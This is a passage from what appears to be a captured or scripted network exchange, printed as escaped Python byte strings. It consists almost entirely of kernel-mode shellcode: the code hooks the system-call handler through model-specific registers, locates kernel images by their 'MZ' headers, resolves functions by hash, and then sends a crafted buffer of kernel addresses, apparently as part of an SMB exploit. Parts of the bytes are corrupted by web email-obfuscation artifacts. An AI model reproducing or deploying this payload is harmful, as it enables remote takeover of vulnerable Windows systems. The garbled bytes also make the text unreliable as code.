\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 